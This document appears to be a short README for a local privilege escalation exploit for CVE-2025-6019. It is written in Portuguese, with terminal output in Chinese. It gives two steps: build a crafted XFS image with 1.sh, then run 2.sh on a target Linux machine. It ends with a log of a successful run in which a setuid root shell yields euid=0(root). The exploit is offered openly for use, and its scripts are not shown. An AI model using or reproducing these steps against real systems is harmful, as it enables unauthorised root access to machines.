
Exploit de escalonamento de privilégio local para CVE-2025-6019 usando imagens de sistema de arquivos XFS manipuladas para obter acesso root shell em sistemas Linux.
Primeiro passo: execute 1.sh no dispositivo Linux para construir xfs.image
Segundo passo: transfira xfs.image para o dispositivo alvo e execute 2.sh. O sucesso é indicado abaixo:
neko@aosc-neko205 [ tmp ] $ bash 2.sh
当前用户: neko
uid=1000(neko) gid=1001(neko) 组=1001(neko),11(audio),12(video),15(cdrom),974(ollama),997(wheel),999(plugdev),1002(gamemode)
('yes',)
Mapped file /home/neko/xfs.image as /dev/loop0.
成功找到 Root Shell: /tmp/blockdev.IK6D92/root-shell
正在提权...
root-shell-5.2# id
uid=1000(neko) gid=1001(neko) euid=0(root) 组=1001(neko),11(audio),12(video),15(cdrom),974(ollama),997(wheel),999(plugdev),1002(gamemode)
root-shell-5.2#